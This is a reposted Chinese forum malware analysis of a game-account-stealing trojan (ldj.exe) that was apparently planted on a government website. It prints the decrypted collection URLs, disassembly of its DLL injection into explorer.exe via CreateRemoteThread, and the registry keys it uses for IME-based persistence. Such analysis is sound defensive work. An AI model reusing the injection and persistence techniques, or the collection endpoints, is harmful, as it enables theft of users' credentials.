2011年9月10日星期六

[轉帖]ldj.exe的分析!并附上部分专杀程式码




作 者: 曹無咎
時 間: 2011-08-10,17:05:35
鏈接: http://bbs.pediy.com/showthread.php?t=138549

發改委網站被掛馬,芳芳發現的,分析了一下
母體文件ldj.exe的分析:(母體文件在加載完ocx後代碼開始混亂了,不知道是我的機子上還有別的木馬,還是加載後的問題)
主要有幾個行為:1,生成dbr99008.ocx和dbr31004.ocx
2,複製rundll.exe到C:\WINDOWS\SYSTEM32\gbvgbv31.exe,並運行,加載上述文件,並註入到explorer.exe中
3,Winston0\default方式交互
4,解密出4個收信網址
00401100 68 74 74 70 3A 2F 2F 67 http://g
00401110 75 63 63 69 2E 74 6C 79 73 6A 2E 63 6F 6D 3A 39 ucci.tlysj.com:9
00401120 39 36 32 2F 66 72 62 2F 72 62 2E 61 73 70 962/frb/rb.asp
00401180 68 74 74 70 3A 2F 2F 67 http://g
00401190 75 63 63 69 2E 74 6C 79 73 6A 2E 63 6F 6D 3A 39 ucci.tlysj.com:9
004011A0 39 36 32 2F 66 74 2E 61 73 70 962/ft.asp
00401208 68 74 74 70 3A 2F 2F 67 75 63 63 69 2E 74 6C 79 http://gucci.tly
00401218 73 6A 2E 63 6F 6D 3A 39 39 36 32 2F 46 6F 6E 65 sj.com:9962/Fone
00401228 39 2F 6A 75 73 74 2E 61 73 70 9/just.asp
00401288 68 74 74 70 3A 2F 2F 76 35 2E 37 31 77 61 70 2E http://v5.71wap.
00401298 63 6F 6D 3A 39 39 36 32 2F 46 6F 6E 65 39 2F 6A com:9962/Fone9/j
004012A8 75 73 74 2E 61 73 70 ust.asp
另外,還生成一種字體ttf文件,沒發現有什麼作用,應該是中間過度吧,不過一直在fonts文件夾下就沒有找到這個文件! !
母體加了upx,到達oep,像一些簡單的函數,就不貼代碼了

代碼:
00401EB9 55 push ebp
00401EBA 8BEC mov ebp, esp
00401EBC 81EC 580A0000 sub esp, 0A58
00401EC2 53 push ebx
00401EC3 56 push esi
00401EC4 57 push edi
00401EC5 6A 40 push 40
00401EC7 33DB xor ebx, ebx
00401EC9 59 pop ecx
00401ECA 33C0 xor eax, eax
00401ECC 8DBD C9FDFFFF lea edi, dword ptr [ebp-237]
00401ED2 889D C8FDFFFF mov byte ptr [ebp-238], bl
00401ED8 8B35 A8104000 mov esi, dword ptr [4010A8] ; MSVCRT.sprintf
00401EDE F3:AB rep stos dword ptr es:[edi]
00401EE0 66:AB stos word ptr es:[edi]
00401EE2 AA stos byte ptr es:[edi]
00401EE3 68 FC154000 push 004015FC ; ASCII "008"
00401EE8 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
00401EEE 68 F0154000 push 004015F0 ; ASCII "dbr99%s.ocx"
00401EF3 50 push eax
00401EF4 C645 FC 54 mov byte ptr [ebp-4], 54 ; TLS
00401EF8 C645 FD 4C mov byte ptr [ebp-3], 4C
00401EFC C645 FE 53 mov byte ptr [ebp-2], 53
00401F00 885D FF mov byte ptr [ebp-1], bl
00401F03 FFD6 call esi
00401F05 83C4 0C add esp, 0C
00401F08 33C0 xor eax, eax
00401F0A 8DBD C5FCFFFF lea edi, dword ptr [ebp-33B]
00401F10 889D C4FCFFFF mov byte ptr [ebp-33C], bl
00401F16 6A 40 push 40
00401F18 889D C0FBFFFF mov byte ptr [ebp-440], bl
00401F1E 59 pop ecx
00401F1F C685 CCFEFFFF 7>mov byte ptr [ebp-134], 72
00401F26 F3:AB rep stos dword ptr es:[edi]
00401F28 66:AB stos word ptr es:[edi]
00401F2A AA stos byte ptr es:[edi]
00401F2B 6A 40 push 40
00401F2D 33C0 xor eax, eax
00401F2F 59 pop ecx
00401F30 8DBD C1FBFFFF lea edi, dword ptr [ebp-43F]
00401F36 F3:AB rep stos dword ptr es:[edi]
00401F38 66:AB stos word ptr es:[edi]
00401F3A AA stos byte ptr es:[edi]
00401F3B 6A 3D push 3D
00401F3D 33C0 xor eax, eax
00401F3F 59 pop ecx
00401F40 8DBD D9FEFFFF lea edi, dword ptr [ebp-127]
00401F46 C685 CDFEFFFF 7>mov byte ptr [ebp-133], 75 ; rundll32.exe
00401F4D C685 CEFEFFFF 6>mov byte ptr [ebp-132], 6E
00401F54 C685 CFFEFFFF 6>mov byte ptr [ebp-131], 64
00401F5B C685 D0FEFFFF 6>mov byte ptr [ebp-130], 6C
00401F62 C685 D1FEFFFF 6>mov byte ptr [ebp-12F], 6C
00401F69 C685 D2FEFFFF 3>mov byte ptr [ebp-12E], 33
00401F70 C685 D3FEFFFF 3>mov byte ptr [ebp-12D], 32
00401F77 C685 D4FEFFFF 2>mov byte ptr [ebp-12C], 2E
00401F7E C685 D5FEFFFF 6>mov byte ptr [ebp-12B], 65
00401F85 C685 D6FEFFFF 7>mov byte ptr [ebp-12A], 78
00401F8C C685 D7FEFFFF 6>mov byte ptr [ebp-129], 65
00401F93 889D D8FEFFFF mov byte ptr [ebp-128], bl
00401F99 F3:AB rep stos dword ptr es:[edi]
00401F9B 66:AB stos word ptr es:[edi]
00401F9D AA stos byte ptr es:[edi]
00401F9E 6A 40 push 40
00401FA0 33C0 xor eax, eax
00401FA2 59 pop ecx
00401FA3 8DBD B9F9FFFF lea edi, dword ptr [ebp-647]
00401FA9 889D B8F9FFFF mov byte ptr [ebp-648], bl
00401FAF F3:AB rep stos dword ptr es:[edi]
00401FB1 66:AB stos word ptr es:[edi]
00401FB3 AA stos byte ptr es:[edi]
00401FB4 E8 02F9FFFF call 004018BB ; 提權
00401FB9 BF 04010000 mov edi, 104
00401FBE 8D85 B0F7FFFF lea eax, dword ptr [ebp-850]
00401FC4 57 push edi
00401FC5 50 push eax
00401FC6 53 push ebx
00401FC7 FF15 50104000 call dword ptr [401050] ; kernel32.GetModuleFileNameA
00401FCD 8D45 D0 lea eax, dword ptr [ebp-30]
00401FD0 68 E4154000 push 004015E4 ; 得到生成dbr31004.ocx的路徑
00401FD5 50 push eax
00401FD6 FFD6 call esi
00401FD8 8D45 D0 lea eax, dword ptr [ebp-30]
00401FDB 50 push eax
00401FDC 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00401FE2 50 push eax
00401FE3 E8 A8020000 call 00402290 ; jmp 到MSVCRT.strcpy
00401FE8 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00401FEE 68 DC154000 push 004015DC ; ASCII ".ocx"
00401FF3 50 push eax
00401FF4 E8 91020000 call 0040228A ; jmp 到MSVCRT.strcat
00401FF9 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00401FFF 50 push eax
00402000 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00402006 50 push eax
00402007 E8 BEFAFFFF call 00401ACA ; 得到C:\WINDOWS\SYSTEM32\dbr31004.ocx路徑
0040200C 8D85 B0F7FFFF lea eax, dword ptr [ebp-850]
00402012 50 push eax
00402013 E8 8AFBFFFF call 00401BA2 ; 打開文件,讀入數據,並解密出網址,這裡讀入的就是加密的網址,裡面實現解密

這裡我們來看看是解密函數:這個比較簡單,獲取字符串"LUDJ"的長度,以此為循環的小條件,讀取118h大小的數據,簡單的ror操作
我們來看看解密函數(ror):

代碼:
00401B3C 55 push ebp
00401B3D 8BEC mov ebp, esp
00401B3F 53 push ebx
00401B40 56 push esi
00401B41 57 push edi
00401B42 8B75 08 mov esi, dword ptr [ebp+8]
00401B45 8B7D 10 mov edi, dword ptr [ebp+10]
00401B48 8B5D 0C mov ebx, dword ptr [ebp+C]
00401B4B 8B55 14 mov edx, dword ptr [ebp+14]
00401B4E 85DB test ebx, ebx
00401B50 74 18 je short 00401B6A
00401B52 8A06 mov al, byte ptr [esi]
00401B54 8A0F mov cl, byte ptr [edi]
00401B56 D2C8 ror al, cl
00401B58 8806 mov byte ptr [esi], al
00401B5A 46 inc esi
00401B5B 47 inc edi
00401B5C 4B dec ebx
00401B5D 4A dec edx
00401B5E 85D2 test edx, edx
00401B60 ^ 75 EC jnz short 00401B4E
00401B62 8B55 14 mov edx, dword ptr [ebp+14]
00401B65 8B7D 10 mov edi, dword ptr [ebp+10]
00401B68 ^ EB E4 jmp short 00401B4E
00401B6A 5F pop edi
00401B6B 5E pop esi
00401B6C 5B pop ebx
00401B6D 5D pop ebp
00401B6E C3 retn
代碼:
00402018 83C4 24 add esp, 24
0040201B 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
00402021 C645 F4 5C mov byte ptr [ebp-C], 5C ;得到fonts\dbr31004.ttf路徑
00402025 C645 F5 66 mov byte ptr [ebp-B], 66
00402029 57 push edi
0040202A 50 push eax
0040202B C645 F6 6F mov byte ptr [ebp-A], 6F
0040202F C645 F7 6E mov byte ptr [ebp-9], 6E
00402033 C645 F8 74 mov byte ptr [ebp-8], 74
00402037 C645 F9 73 mov byte ptr [ebp-7], 73
0040203B C645 FA 5C mov byte ptr [ebp-6], 5C
0040203F 885D FB mov byte ptr [ebp-5], bl
00402042 FF15 4C104000 call dword ptr [40104C] ; kernel32.GetWindowsDirectoryA
00402048 8D45 F4 lea eax, dword ptr [ebp-C]
0040204B 50 push eax
0040204C 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
00402052 50 push eax
00402053 E8 32020000 call 0040228A ; jmp 到MSVCRT.strcat
00402058 8D45 D0 lea eax, dword ptr [ebp-30]
0040205B 50 push eax
0040205C 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
00402062 50 push eax
00402063 E8 22020000 call 0040228A ; jmp 到MSVCRT.strcat
00402068 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
0040206E 68 D4154000 push 004015D4 ; ASCII ".ttf"
00402073 50 push eax
00402074 E8 11020000 call 0040228A ; jmp 到MSVCRT.strcat
00402079 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
0040207F 50 push eax
00402080 E8 06FEFFFF call 00401E8B ;create文件,但是在相應目錄下並沒有找到文件
00402085 8B3D 70104000 mov edi, dword ptr [401070] ; kernel32.GetTickCount,獲得系統啟動到現在的總時間,要隨機生成文件了
0040208B 83C4 1C add esp, 1C
0040208E FFD7 call edi
00402090 50 push eax
00402091 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
00402097 68 C4154000 push 004015C4 ; ASCII "%08Xmdd.temp"
0040209C 50 push eax
0040209D FFD6 call esi
0040209F 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020A5 50 push eax
004020A6 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020AC 50 push eax
004020AD E8 DAF9FFFF call 00401A8C ;這些temp文件的路徑為tmp路徑
004020B2 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020B8 50 push eax
004020B9 8D45 FC lea eax, dword ptr [ebp-4]
004020BC 6A 66 push 66
004020BE 50 push eax ;TLS
004020BF 53 push ebx
004020C0 E8 61F8FFFF call 00401926 ;通過findresource的方式釋放文件,大小9E00,並得到PE頭的地址為00404090
這個函數的作用是生成dbr31004.ocx文件,首先通過上面剛剛得到的臨時文件,向其中寫入9E00的數據,地址為00404090
004020C5 83C4 24 add esp, 24
004020C8 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
004020CE 6A 03 push 3
004020D0 50 push eax
004020D1 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020D7 50 push eax
004020D8 FF15 54104000 call dword ptr [401054] ; kernel32.MoveFileExA,將剛剛生成的temp移動到system32文件夾下,並刪除掉temp文件
004020DE 8D85 C4FCFFFF lea eax, dword ptr [ebp-33C]
004020E4 50 push eax
004020E5 FF15 58104000 call dword ptr [401058] ; kernel32.DeleteFileA
004020EB FFD7 call edi
004020ED 50 push eax
004020EE 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
004020F4 68 B4154000 push 004015B4 ; ASCII "%08Xeime.temp" 這個與上述相同,不再贅述,這是在system32生成dbr99008.ocx,tmp
文件夾生成的temp都刪除掉
004020F9 50 push eax
004020FA FFD6 call esi
004020FC 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402102 50 push eax
00402103 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402109 50 push eax
0040210A E8 7DF9FFFF call 00401A8C
0040210F 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402115 50 push eax
00402116 8D45 FC lea eax, dword ptr [ebp-4]
00402119 6A 67 push 67
0040211B 50 push eax
0040211C 53 push ebx
0040211D E8 04F8FFFF call 00401926
00402122 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
00402128 50 push eax
00402129 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
0040212F 50 push eax
00402130 E8 95F9FFFF call 00401ACA ;得到system32的路徑,不再詳細描述
00402135 83C4 2C add esp, 2C
00402138 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
0040213E 6A 03 push 3
00402140 50 push eax
00402141 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402147 50 push eax
00402148 FF15 54104000 call dword ptr [401054] ; kernel32.MoveFileExA
0040214E 8D85 C0FBFFFF lea eax, dword ptr [ebp-440]
00402154 50 push eax
00402155 FF15 58104000 call dword ptr [401058] ; kernel32.DeleteFileA
0040215B 8D85 CCFEFFFF lea eax, dword ptr [ebp-134]
00402161 50 push eax
00402162 8D85 CCFEFFFF lea eax, dword ptr [ebp-134]
00402168 50 push eax
00402169 E8 5CF9FFFF call 00401ACA
0040216E 8D85 B8F9FFFF lea eax, dword ptr [ebp-648]
00402174 50 push eax
00402175 68 A4154000 push 004015A4 ; ASCII "gbvgbv31.exe"
0040217A E8 4BF9FFFF call 00401ACA ;這個gbvgbv.exe其實就是rundll32.exe,在system32文件夾下拷貝生成
0040217F 83C4 10 add esp, 10
00402182 8D85 B8F9FFFF lea eax, dword ptr [ebp-648]
00402188 53 push ebx
00402189 50 push eax
0040218A 8D85 CCFEFFFF lea eax, dword ptr [ebp-134]
00402190 50 push eax
00402191 FF15 6C104000 call dword ptr [40106C] ; kernel32.CopyFileA
00402197 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
0040219D C645 E​​4 65 mov byte ptr [ebp-1C], 65 ;explorer.exe
004021A1 50 push eax
004021A2 8D45 E4 lea eax, dword ptr [ebp-1C]
004021A5 50 push eax
004021A6 C645 E​​5 78 mov byte ptr [ebp-1B], 78
004021AA C645 E​​6 70 mov byte ptr [ebp-1A], 70
004021AE C645 E​​7 6C mov byte ptr [ebp-19], 6C
004021B2 C645 E​​8 6F mov byte ptr [ebp-18], 6F
004021B6 C645 E​​9 72 mov byte ptr [ebp-17], 72
004021BA C645 E​​A 65 mov byte ptr [ebp-16], 65
004021BE C645 E​​B 72 mov byte ptr [ebp-15], 72
004021C2 C645 E​​C 2E mov byte ptr [ebp-14], 2E
004021C6 C645 E​​D 65 mov byte ptr [ebp-13], 65
004021CA C645 E​​E 78 mov byte ptr [ebp-12], 78
004021CE C645 E​​F 65 mov byte ptr [ebp-11], 65
004021D2 885D F0 mov byte ptr [ebp-10], bl
004021D5 E8 1BF5FFFF call 004016F5 ;這個函數創建進程快照,得到那三個函數的地址,查找進程explorer.exe,這裡是要注入線程了

我們來看看找到進程後乾了些什麼吧,這是函數一:
現在來看一看創建進程快照,並註入explorer的函數:

代碼:
00401600 55 push ebp
00401601 8BEC mov ebp, esp
00401603 81EC 08020000 sub esp, 208
00401609 53 push ebx
0040160A 56 push esi
0040160B 57 push edi
0040160C 6A 40 push 40
0040160E 33DB xor ebx, ebx
00401610 59 pop ecx
00401611 33C0 xor eax, eax
00401613 8DBD F9FDFFFF lea edi, dword ptr [ebp-207]
00401619 889D F8FDFFFF mov byte ptr [ebp-208], bl
0040161F 6A 40 push 40
00401621 F3:AB rep stos dword ptr es:[edi]
00401623 66:AB stos word ptr es:[edi]
00401625 AA stos byte ptr es:[edi]
00401626 59 pop ecx
00401627 33C0 xor eax, eax
00401629 8DBD FDFEFFFF lea edi, dword ptr [ebp-103]
0040162F 889D FCFEFFFF mov byte ptr [ebp-104], bl
00401635 F3:AB rep stos dword ptr es:[edi]
00401637 66:AB stos word ptr es:[edi]
00401639 AA stos byte ptr es:[edi]
0040163A E8 7C020000 call 004018BB ;上面提到過這個函數了,提權
0040163F FF75 08 push dword ptr [ebp+8]
00401642 53 push ebx
00401643 68 10040000 push 410
00401648 FF15 84104000 call dword ptr [401084] ; kernel32.OpenProcess,打開explorer.exe的進程
0040164E 8BF8 mov edi, eax
00401650 3BFB cmp edi, ebx
00401652 0F84 8F000000 je 004016E7
00401658 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
0040165E 68 04010000 push 104
00401663 50 push eax
00401664 53 push ebx
00401665 57 push edi
00401666 E8 850C0000 call 004022F0 ; jmp 到PSAPI.GetModuleFileNameExA,獲得文件路徑名C:\WINDOWS\Explorer.EXE
0040166B 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
00401671 50 push eax
00401672 E8 1F0C0000 call 00402296 ; jmp 到MSVCRT.strlen
00401677 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
0040167D 50 push eax
0040167E 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00401684 50 push eax
00401685 E8 060C0000 call 00402290 ; jmp 到MSVCRT.strcpy
0040168A 8B35 94104000 mov esi, dword ptr [401094] ; MSVCRT.strrchr
00401690 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00401696 6A 5C push 5C
00401698 50 push eax
00401699 FFD6 call esi ;explorer.exe首次出現的位置0012F2CA
0040169B 83C4 14 add esp, 14
0040169E 3BC3 cmp eax, ebx
004016A0 74 39 je short 004016DB
004016A2 8818 mov byte ptr [eax], bl
004016A4 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
004016AA 6A 5C push 5C
004016AC 50 push eax
004016AD FFD6 call esi
004016AF 59 pop ecx
004016B0 3BC3 cmp eax, ebx
004016B2 59 pop ecx
004016B3 74 26 je short 004016DB
004016B5 8818 mov byte ptr [eax], bl
004016B7 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
004016BD 68 38154000 push 00401538 ; ASCII "\data\elements.data"
004016C2 50 push eax
004016C3 E8 C20B0000 call 0040228A ; jmp 到MSVCRT.strcat得到路勁C:\data\elements.data
004016C8 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
004016CE 50 push eax
004016CF E8 D5020000 call 004019A9 ;findfirstfile,並沒有找到該文件
004016D4 83C4 0C add esp, 0C
004016D7 85C0 test eax, eax
004016D9 74 13 je short 004016EE
004016DB 57 push edi
004016DC FF15 88104000 call dword ptr [401088] ; kernel32.CloseHandle
004016E2 6A 01 push 1
004016E4 58 pop eax
004016E5 EB 09 jmp short 004016F0
004016E7 53 push ebx
004016E8 FF15 88104000 call dword ptr [401088] ; kernel32.CloseHandle
004016EE 33C0 xor eax, eax
004016F0 5F pop edi
004016F1 5E pop esi
004016F2 5B pop ebx
004016F3 C9 leave
004016F4 C3 retn
函數二:這個是真正的向進程中寫入數據:

代碼:
00401A62 56 push esi
00401A63 FF7424 08 push dword ptr [esp+8]
00401A67 6A 00 push 0
00401A69 6A 2A push 2A
00401A6B FF15 84104000 call dword ptr [401084] ; kernel32.OpenProcess
00401A71 8BF0 mov esi, eax
00401A73 85F6 test esi, esi
00401A75 74 13 je short 00401A8A
00401A77 FF7424 0C push dword ptr [esp+C]
00401A7B 56 push esi
00401A7C E8 56FFFFFF call 004019D7 ;這個函數就是寫入數據的函數
00401A81 59 pop ecx
00401A82 59 pop ecx
00401A83 56 push esi
00401A84 FF15 88104000 call dword ptr [401088] ; kernel32.CloseHandle
00401A8A 5E pop esi
00401A8B C3 retn
那我們就來看看函數004019D7中進行了什麼操作:


代碼:
004019D7 55 push ebp
004019D8 8BEC mov ebp, esp
004019DA 51 push ecx
004019DB 51 push ecx
004019DC 53 push ebx
004019DD 56 push esi
004019DE 57 push edi
004019DF FF75 0C push dword ptr [ebp+C]
004019E2 FF15 14104000 call dword ptr [401014] ; kernel32.lstrlenA
004019E8 8B5D 08 mov ebx, dword ptr [ebp+8]
004019EB 8BF0 mov esi, eax
004019ED 46 inc esi
004019EE 6A 40 push 40
004019F0 68 00100000 push 1000
004019F5 56 push esi
004019F6 6A 00 push 0
004019F8 53 push ebx
004019F9 FF15 44104000 call dword ptr [401044] ; kernel32.VirtualAllocEx,在進程中分配空間,大小21h,得到內存的首地址為02380000
004019FF 8BF8 mov edi, eax
00401A01 85FF test edi, edi
00401A03 74 3B je short 00401A40
00401A05 8D45 FC lea eax, dword ptr [ebp-4]
00401A08 50 push eax
00401A09 56 push esi
00401A0A FF75 0C push dword ptr [ebp+C]
00401A0D 57 push edi
00401A0E 53 push ebx
00401A0F FF15 40104000 call dword ptr [401040] ; kernel32.WriteProcessMemory,這裡將dbr99008.ocx寫入到剛剛分配的進程空間02380000處
00401A15 85C0 test eax, eax
00401A17 74 27 je short 00401A40
00401A19 8D45 F8 lea eax, dword ptr [ebp-8]
00401A1C 50 push eax
00401A1D 33C0 xor eax, eax
00401A1F 50 push eax
00401A20 57 push edi
00401A21 FF35 7C104000 push dword ptr [40107C] ; kernel32.LoadLibraryA
00401A27 50 push eax
00401A28 50 push eax
00401A29 53 push ebx
00401A2A FF15 3C104000 call dword ptr [40103C] ; kernel32.CreateRemoteThread創建遠程線程

0012F380 00000080 |hProcess = 00000080 (window)
0012F384 00000000 |lpThreadAttributes
0012F388 00000000 |dwStackSize = 0
0012F38C 7C801D7B |lpStartAddress = kernel32.LoadLibraryA
0012F390 02380000 |lpParameter = 02380000
0012F394 00000000 |dwCreationFlags = 0
0012F398 0012F3A8 \lpThreadId = 0012F3A8


00401A30 85C0 test eax, eax
00401A32 8945 0C mov dword ptr [ebp+C], eax
00401A35 74 09 je short 00401A40
00401A37 6A FF push -1
00401A39 50 push eax
00401A3A FF15 38104000 call dword ptr [401038] ; kernel32.WaitForSingleObject
00401A40 68 00400000 push 4000
00401A45 56 push esi
00401A46 57 push edi
00401A47 53 push ebx
00401A48 FF15 34104000 call dword ptr [401034] ; kernel32.VirtualFreeEx
00401A4E 837D 0C 00 cmp dword ptr [ebp+C], 0
00401A52 5F pop edi
00401A53 5E pop esi
00401A54 5B pop ebx
00401A55 74 09 je short 00401A60
00401A57 FF75 0C push dword ptr [ebp+C]
00401A5A FF15 88104000 call dword ptr [401088] ; kernel32.CloseHandle
00401A60 C9 leave
00401A61 C3 retn
這個就是注入函數了!


代碼:
004021DA B9 81000000 mov ecx, 81
004021DF 33C0 xor eax, eax
004021E1 8DBD A9F5FFFF lea edi, dword ptr [ebp-A57]
004021E7 889D A8F5FFFF mov byte ptr [ebp-A58], bl
004021ED F3:AB rep stos dword ptr es:[edi]
004021EF 66:AB stos word ptr es:[edi]
004021F1 AA stos byte ptr es:[edi]
004021F2 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
004021F8 50 push eax
004021F9 E8 ABF7FFFF call 004019A9 ;查找文件dbr31004.ocx,找到,沒有跳轉
004021FE 8B35 BC104000 mov esi, dword ptr [4010BC] ; USER32.wsprintfA
00402204 83C4 0C add esp, 0C
00402207 85C0 test eax, eax
00402209 74 32 je short 0040223D
0040220B 8D85 B0F7FFFF lea eax, dword ptr [ebp-850]
00402211 50 push eax
00402212 8D85 BCFAFFFF lea eax, dword ptr [ebp-544]
00402218 50 push eax
00402219 8D85 B8F9FFFF lea eax, dword ptr [ebp-648]
0040221F 50 push eax
00402220 8D85 A8F5FFFF lea eax, dword ptr [ebp-A58]
00402226 68 8C154000 push 0040158C ; ASCII "%s %s pfjaoidjglkajd %s"
0040222B 50 push eax
0040222C FFD6 call esi
0040222E 8D85 A8F5FFFF lea eax, dword ptr [ebp-A58]
00402234 50 push eax
00402235 E8 87FBFFFF call 00401DC1 ;創建進程gbvgbv31.exe
0040223A 83C4 18 add esp, 18
0040223D 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
00402243 50 push eax
00402244 E8 60F7FFFF call 004019A9
00402249 85C0 test eax, eax
0040224B 59 pop ecx
0040224C 74 2B je short 00402279
0040224E 8D85 C8FDFFFF lea eax, dword ptr [ebp-238]
00402254 50 push eax
00402255 8D85 B8F9FFFF lea eax, dword ptr [ebp-648]
0040225B 50 push eax
0040225C 8D85 A8F5FFFF lea eax, dword ptr [ebp-A58]
00402262 68 74154000 push 00401574 ; ASCII "%s %s pfjieaoidjglkajd"
00402267 50 push eax
00402268 FFD6 call esi
0040226A 8D85 A8F5FFFF lea eax, dword ptr [ebp-A58]
00402270 50 push eax
00402271 E8 4BFBFFFF call 00401DC1
00402276 83C4 14 add esp, 14
00402279 53 push ebx
0040227A FF15 68104000 call dword ptr [401068] ; kernel32.ExitProcess退出進程
00402280 6A 01 push 1
00402282 58 pop eax
00402283 5F pop edi
00402284 5E pop esi
00402285 5B pop ebx
00402286 C9 leave
00402287 C2 1000 retn 10
上述,通過gbvgbv31.exe運行dbr31004.ocx,dbr99008.ocx兩個文件:

C:\WINDOWS\system32\dbr31004.ocx 0x10000000 0x0000E000
C:\WINDOWS\system32\DBR99008.OCX 0x00C30000 0x00006000

注入到explorer.exe中的文件,C:\WINDOWS\system32\dbr99008.ocx 基址:0x03800000,大小:0x00006000
                            C:\WINDOWS\system32\dbr31004.ocx 基址:0x03EB0000,大小:0x0000E000

代碼:

現在來分析dbr99008.ocx,這個函數的主要作用修改註冊表中的輸入法表項,將dbr99008.ocx與kbdus.dll關聯,如下:


HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layouts\E0200804
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0200804

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layouts\E0200804]
Ime File = "DBR99008.OCX"
Layout Text = "US"
Layout File = "kbdus.dll"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0200804]
Ime File = "DBR99008.OCX"
Layout Text = "US"
Layout File = "kbdus.dll"
[HKEY_CURRENT_USER\Keyboard Layout\Preload]
2 = "E0200804"

主要的壞事是在dbr31004.ocx文件中完成的,這裡就不貼dbr99008.ocx的代碼了

還有就是在臨時目錄裡生成了win28007d9039.dll這個文件,這個實際上就是kernel32.dll了

簡單建立幾個窗口,偽裝成ldjgame.exe,launch.exe便於分析
首先這是一個盜號木馬,遊戲有:鹿鼎記,SMDL(神魔大陸),QQ遊戲,之前做的記錄全都沒了,現在就簡單的分析幾個線程吧
並幹掉360系列
dbr31004.ocx主要創建了7個線程:


現在來看dbr31004.ocx文件的分析

代碼:
1000A564 > 55 push ebp
1000A565 8BEC mov ebp, esp
1000A567 81EC 18010000 sub esp, 118
1000A56D 837D 0C 01 cmp dword ptr [ebp+C], 1
1000A571 74 09 je short 1000A57C
1000A573 817D 0C 6666888>cmp dword ptr [ebp+C], 88886666
1000A57A 75 60 jnz short 1000A5DC
1000A57C 8D45 EC lea eax, dword ptr [ebp-14]
1000A57F 6A 01 push 1
1000A581 50 push eax
1000A582 FF15 20300010 call dword ptr [<&ADVAPI32.Initialize>; ADVAPI32.InitializeSecurityDescriptor
1000A588 6A 00 push 0
1000A58A 6A 00 push 0
1000A58C 8D45 EC lea eax, dword ptr [ebp-14]
1000A58F 6A 01 push 1
1000A591 50 push eax
1000A592 FF15 00300010 call dword ptr [<&ADVAPI32.SetSecurit>; ADVAPI32.SetSecurityDescriptorDacl
1000A598 FF15 2C310010 call dword ptr [<&KERNEL32.GetCurrent>; kernel32.GetCurrentProcessId
1000A59E 50 push eax ; 得到loaddll.exe的PID
1000A59F 8D85 E8FEFFFF lea eax, dword ptr [ebp-118]
1000A5A5 68 EC3E0010 push 10003EEC ; ASCII "gbvLUDJ31004_rel_regamle_%08d_"
1000A5AA 50 push eax
1000A5AB FF15 F0310010 call dword ptr [<&USER32.wsprintfA>] ; USER32.wsprintfA
1000A5B1 8D85 E8FEFFFF lea eax, dword ptr [ebp-118]
1000A5B7 50 push eax
1000A5B8 E8 49A4FFFF call 10004A06 ; 創建互斥變量
1000A5BD 83C4 10 add esp, 10
1000A5C0 85C0 test eax, eax
1000A5C2 74 04 je short 1000A5C8
1000A5C4 33C0 xor eax, eax
1000A5C6 EB 17 jmp short 1000A5DF
1000A5C8 FF75 10 push dword ptr [ebp+10]
1000A5CB FF75 0C push dword ptr [ebp+C]
1000A5CE FF75 08 push dword ptr [ebp+8]
1000A5D1 E8 B6FEFFFF call 1000A48C ;這個call很關鍵,裡面進行了各種PE操作,得到kernel32.dll等的函數地址
1000A5D6 83C4 0C add esp, 0C
1000A5D9 8945 0C mov dword ptr [ebp+C], eax
1000A5DC 8B45 0C mov eax, dword ptr [ebp+C]
1000A5DF C9 leave
1000A5E0 C2 0C00 retn 0C



現在我們進入call 1000A48C:


1000A48C 55 push ebp
1000A48D 8BEC mov ebp, esp
1000A48F 83EC 10 sub esp, 10
1000A492 53 push ebx
1000A493 8B1D 4C300010 mov ebx, dword ptr [<&KERNEL32.GetMo>; kernel32.GetModuleFileNameA
1000A499 56 push esi
1000A49A 57 push edi
1000A49B BF D82C0010 mov edi, 10002CD8
1000A4A0 68 04010000 push 104
1000A4A5 57 push edi
1000A4A6 6A 00 push 0
1000A4A8 FFD3 call ebx
1000A4AA BE 66668888 mov esi, 88886666
1000A4AF 3975 0C cmp dword ptr [ebp+C], esi
1000A4B2 75 11 jnz short 1000A4C5
1000A4B4 FF75 10 push dword ptr [ebp+10]
1000A4B7 68 D42B0010 push 10002BD4 ; ASCII "C:\WINDOWS\system32\dbr31004.ocx"
1000A4BC E8 11090000 call <jmp.&MSVCRT.strcpy>
1000A4C1 59 pop ecx
1000A4C2 59 pop ecx
1000A4C3 EB 0F jmp short 1000A4D4
1000A4C5 68 04010000 push 104
